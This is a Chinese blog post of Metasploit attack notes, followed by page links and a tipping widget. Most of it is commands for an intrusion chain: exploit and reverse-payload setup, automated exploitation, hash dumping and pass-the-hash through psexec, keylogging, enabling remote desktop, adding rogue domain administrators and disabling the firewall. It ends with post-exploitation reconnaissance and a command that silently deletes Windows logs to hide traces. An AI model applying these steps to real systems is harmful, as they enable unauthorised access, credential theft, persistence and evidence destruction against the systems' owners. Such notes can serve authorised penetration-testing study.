MSF经典attack示范

最新推荐文章于 2024-09-15 20:34:10 发布
最新推荐文章于 2024-09-15 20:34:10 发布
阅读量1.1k 收藏 8
点赞数 35
分类专栏: # kali 文章标签: 安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/141173390
版权

免责声明:本文仅做分享... 

目录

Nessus官网

指定攻击

自动在线攻击

nmap扫

查看扫到的服务

查看主机

离线攻击

 Msfvenom

本地快速传递文件的方法-->py

哈希传递攻击

提权

后渗透阶段

1-收集操作系统和版本信息

2-主机名称&环境变量

3-用户账户信息

4-远程端口

5-网络信息

6-应用程序和服务

7-注册表

8-系统权限

9-清理痕迹:

Nessus官网

可以联动MSF.

Tenable 风险暴露管理解决方案指南 | Tenable® (tenablecloud.cn)

试用7day 

指定攻击

手工--命令

创建
--高级扫描
--设置名字,目标--开扫(简单的扫描)

search
use exploit/
show payloads

set windows/meterpreter/
>>tab键

bind一般不过
reverse

show options
set ........
set target ...(不填会默认帮你选)


exploit
meterpreter > sysinfo     //看系统的信息


ctrl+C
background(挂起来)
sessions  //看到拿下的所有会话
sessions ...

sessions -h

session -k id  //踢掉会话

 

自动在线攻击

--先连接数据库欧...

自动化

nmap扫

查看扫到的服务

查看主机

db_autpwn.rb

/usr/share/Metasploit-Framework/plugins/

load xxx

自动干...(时间长) 

db_autpwn -p -t -e

离线攻击

马子上

 Msfvenom

Msfvenom是净荷生成和编码的组合,它在2015年6月8日取代了MsfPayload和MsfEncode这两个工具。

The advantages of msfvenom are(优点):

One single tool (一个单一的集成工具)

Standardizedcommandlineoptions(命令行选项标准化)

Increased speed(优化速度)

msfvenom -l payloads
msfvenom --help-formats
msfvenom -l encoders

马子自己上线吧 

本地快速传递文件的方法-->py

在某个目录下运行: 

python -m SimpleHTTPServer <port>

哈希传递攻击

meterpreter>run hashdump

use exploit/windows/smb/psexec
set 
set smbuser <用户名>
set smbpass <hash值>
exploit


拿下后--->
sysinfo
getuid
ps   --找管理员用的进程
migrate <进程号>    --迁移权限
getuid   

keyscan_start

run get_local_subnets   //网络

添加路由,下一跳的流量给...

run getgui -e    //打开win2008远程桌面


shell
net user xxx xxx /add
net user xxx xxx /add /domain

net localgroup administrators xxx
net localgroup administrators xxx /doamin
net group "域" xxx /add /domain


netsh firewall set opmode enable
netsh firewall set opmode disable


rdesktop <IP>

提权

脚本

MSF全自动:

http://t.csdnimg.cn/7qKYy

CS半自动

域控提权:  CVE + 票据

klist purge
klist

 

后渗透阶段

--得到点东西

(手工/工具)

命令

脚本

1-收集操作系统和版本信息

systeminfo
systeminfo | findstr /B /C:"OS <Name>"

2-主机名称&环境变量

hostname

set

3-用户账户信息

net user    #查看本地所有用户账户
net localgroup      查看本地所有用户组
netuser/domain      查看域用户账户
net group/domain    查看域用户组
net group "Domain Admins"/domain     查看特定域组中的用户

4-远程端口

netstat -ano | more        查看开放端口与连接

5-网络信息

ipconfig /all        查看网络配置
route print I        查看路由表
arp -a                查看ARP缓存

6-应用程序和服务

wmic product list brief

查看当前已安装的应用程序

7-注册表

直接读取密码?!

Password – Penetration Testing Lab (pentestlab.blog)

8-系统权限

cacls 
cacls c:\

 

wmic > process where name="进程名称.exe" list full
# 显示进程的详细信息

 

9-清理痕迹:

del %WINDIR%*.log /a/s/q/f
# 强制静默删除只读文件

金灰
关注
专栏目录
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 286
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
APT组织最喜欢的工具 Cobalt Strike (CS) 实战
悦分享
08-03 2189
Cobalt Strike是一款以Metasploit为基础的GUI框架式渗透测试工具,自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,常被业界人称为CS神器。Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。...
Kali Linux-SET社会工程学攻击
道阻且长,行则将至。
12-26 1万+
前言 社会工程攻击,是一种利用“社会工程学” (Social Engineering)来实施的网络攻击行为。比如免费下载的软件中捆绑了流氓软件、免费音乐中包含病毒、钓鱼网站、垃圾电子邮件中包括间谍软件等,都是近来社会工程学的代表应用。 Kali Linux系统集成了一款社会工程学工具包 Social Engineering Toolkit (SET),它是一个基于Python的开源的社会工程学渗透...
Kali Linux-SET社会工程学攻击_kali社会工程学攻击
erthre的博客
04-28 812
当心来路不明的服务供应商等人的电子邮件、即时简讯以及电话。在提供任何个人信息之前验证其可靠性和权威性;永远不要点击来自未知发送者的电子邮件中的嵌入链接,如果有必要就使用搜索引擎寻找目标网站或手动输入网站URL;先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前在阿里深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
生命在于学习——Cobalt Strike体验
易水哲的博客
11-02 1039
Cobalt Strike学习的记录
CobaltStrike后渗透工具精华教程
weixin_44155363的博客
03-27 3854
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服...
一款最受欢迎的DOS攻击工具——LOIC(非常详细)零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
07-05 1200
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Cobalt Strike使用教程一
热门推荐
迷风小白
10-24 7万+
0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集...
Kali渗透测试之四漏洞映射
服务猿
05-12 2181
◆漏洞映射: 根据已经发现的开放端口和服务程序,查找、分析目标系统中存在的漏洞 漏洞映射旨在识别和分析目标环境中的决定性安全缺陷,有时也称为脆弱性评估。它是一种 在IT基础设施的安全控制中探寻已知弱点的分析方法,是脆弱性管理计划的一个关键组成部 分。测试人员在完成了信息收集、目标识别和服务枚举的相关工作后,就可着手分析目标设 施中可能存在的安全漏洞。安全漏洞可能导致目标...
linux系统安装msf的过程详解
09-14
在Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
MSF技术总结
05-07
MSF 技术总结 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 ...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
元器件应用中的MSF系列MSF7907L集成电路实用检测数据
11-20
MSF7907L是一款专门用于提供稳定-7伏特电源的集成电路,它在电子设备中的应用至关重要,特别是对于确保电路中各个组件能够获得精确、稳定的电压输入。这款芯片采用了3脚单列直插式塑料封装,设计紧凑,便于在电路板...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
AI在医学领域:医学AI的安全与隐私全面概述
声纹感知 洞察芯声
09-12 1380
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1139
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
无限边界:现代整合安全如何保护云
最新发布
网络研究观
09-15 671
通过工具之间更有效的数据共享,整合的安全平台还应提供更紧密的安全集成以及更强的系统可视性(无论是在云端还是在本地),让您能够看到无限周界的边缘。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 514
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
内网MSF基础:PostgreSQL配置与权限管理教程
本篇文章主要介绍了在内网环境中使用Metasploit Framework (MSF)进行基础操作和配置的过程。MSF是一个广泛应用于渗透测试和网络安全的开源工具集,本文首先着重于如何在内网环境中设置和管理PostgreSQL数据库,因为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值